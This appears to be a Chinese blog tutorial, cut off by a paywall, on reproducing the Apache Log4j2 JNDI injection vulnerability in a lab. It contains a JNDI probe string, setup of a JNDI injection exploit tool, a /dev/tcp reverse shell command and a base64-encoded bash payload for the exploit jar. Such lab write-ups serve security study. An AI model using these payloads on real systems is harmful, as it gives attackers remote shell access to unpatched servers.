Apache log4j2漏洞复现

最新推荐文章于 2024-10-17 11:57:21 发布
原创 最新推荐文章于 2024-10-17 11:57:21 发布 · 543 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#apache #log4j

目录

步骤一启动环境

步骤二检查是否存在log4j2漏洞

网站:CEYE - Monitor service for security testing 

将这个${jndi:ldap://lbjc0a.ceye.io},输入目标网站

步骤三安装jndi注入工具,并且反弹shell

1.在kali安装下列这个文件夹

git clone GitHub - sayers522/JNDI-Injection-Exploit: JNDI命令注入利用

2.进入目录,使用mvn工具打包

2.1未进行安装的话,安装mvn

apt install maven -y

2.2打包

mvn clean package -DskipTests

2.3会生成一个target文件夹:

步骤四设置好监听和反弹shell

1.反弹shell

sh -i >& /dev/tcp/192.168.1.242/8080 0>&1

2.进行base64编码

3.使用jndi的jar包

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjI0Mi84MDgwIDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.1.242"

4.设置监听

5.将payload复制进行url编码,在目标网站进行运行

步骤五成功上线

步骤一启动环境

步骤二检查是否存在log4j2漏洞

网站:CEYE - Monitor service for security testing 

将这个${jndi:ldap://lbjc0a.ceye.io},输入目标网站

步骤三安装jndi注入工具,并且反弹shell

1.在kali安装下列这个文件夹

最低0.47元/天 解锁文章
Apache Log4j2漏洞复现
qq_62056583的博客
07-20 1118
复现并分析【CVE-2021044228】Apache Log4j2 Server 反序列化命令执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现漏洞
Apache log4j2远程代码执行漏洞复现
世间繁华梦一出
12-11 1万+
Apache log4j2 远程代码执行漏洞复现漏洞描述漏洞影响范围漏洞复现步骤:深度利用——反弹shell防御措施 漏洞描述 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的请求包,最终出发远程代码执行。该漏洞实际上是组件解析缺陷导致的。 漏洞影响范围 2.0 <= Apache
log4j2-CVE-2021-44228-漏洞复现
qq_18831583的博客
01-13 412
log4j2-CVE-2021-44228-漏洞复现
代码审计.SpringBoot(Tmall).Log4j2漏洞
qq_34012951的博客
02-22 280
1、pom文件查看版本,此版本存在漏洞。3、追溯漏洞参数,定位入口。
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 2万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
分析Apache Log4j2 远程代码执行漏洞
ordersyhack
02-04 1万+
分析Apache Log4j2 远程代码执行漏洞
记一次:Apache Log4j2 漏洞复现(详细过程)
Lisoning的博客
10-09 4684
Apache Log4j2漏洞复现及相关知识原理
log4j2漏洞复现
qq_68186313的博客
08-01 667
log4j2漏洞复现
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 3661
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
Apache Log4j 漏洞修复
weixin_43354218的博客
12-19 704
Log4j 漏洞修复 文章目录Log4j 漏洞修复1漏洞介绍2漏洞修复2.1 1.升级Log4j版本2.2 配置启动参数 1漏洞介绍 Apache Log4j2 是一款优秀的 Java 日志框架,Log4j 2.x – 2.14.0 版本 Lookup 基于 JNDI(Java Naming and Directory Interface),而 JNDI 支持 RMI ( Remote Method Invocation )。这导致在打印用户输入特定文本时可能远程调用任意代码在本地执行。 2漏洞
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 3544
Apache log4jApache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
Apache Log4j2 远程代码执行漏洞复现
renyizou的博客
03-06 5194
靶场: Vulfocus 靶场环境 目前 Vulfocus 已经集成 Log4j2 环境,可通过以下链接启动环境测试:http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c 也可通过 docker pull vulfocus/log4j2-rce-2021-12-09:latest 拉取本地环境运行。 漏洞复现: 我是本地复现: 环境: *服务器地址:kali ip(192.168.30.1
【亲测免费】 Log4j2漏洞检测工具
最新发布
gitblog_09747的博客
10-17 433
Log4j2漏洞检测工具 去发现同类优质开源项目:https://gitcode.com/ 简介 本仓库提供了一个用于检测项目中是否存在Log4j2漏洞的工具。该工具旨在帮助开发者和安全团队快速识别并修复潜在的安全风险,确保项目的安全性。 功能特点 漏洞检测:自动扫描项目中的代码和依赖库,检测是否存在已知的Log4j2漏洞。 工作使用:适用于日常开发和安全审计,帮助团队及时发现并修复安全问题。 ...
log4j2漏洞复现及修复
csdn565973850的博客
07-27 2661
简单验证log4j2漏洞复现效果及修复
Apache log4j2漏洞
m0_63645854的博客
06-13 693
本文介绍了log4j2的远程代码执行漏洞
Apache Dubbo Provider 远程代码执行漏洞 (CVE-2020-1948)附docker环境
scrooge51的博客
07-07 876
漏洞原理 Dubbo协议默认采用Hessian作为序列化反序列化方式,而Hessian存在危险的反序列化漏洞,攻击者发送未经验证的服务名或方法名的RPC请求,使Dubbo服务端加载远程恶意类从而执行恶意代码. 影响版本 Apache Dubbo 2.7.0 ~ 2.7.6 Apache Dubbo 2.6.0 ~ 2.6.7 Apache Dubbo 2.5.x 所有版本 (官方不再提供支持) 复现流程 漏洞环境(待审核) 1. 利用docker搭建漏洞环境 //本地创建环境: cd docker/
Log4j2 重大漏洞与解决方案
热门推荐
小夏陌的博客
12-14 7万+
1210日(上周五)开始,朋友圈,各种论坛、公众号和群,都在讨论一个Log4j漏洞,多少程序员半夜爬起来改代码,甚至威胁到了全球网络安全。为什么这个漏洞反应这么强烈呢?
Log4j2漏洞复现
weixin_51519028的博客
08-12 1万+
Apache Log4j2Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。202112 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......
apache log4j2 漏洞复现
06-28
Apache Log4j2漏洞是一种远程代码执行漏洞,攻击者可以利用该漏洞在受影响的服务器上执行任意代码。攻击者可以通过构造特定的请求,将恶意代码注入到受影响的服务器上,从而实现远程代码执行。该漏洞已被广泛利用,...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值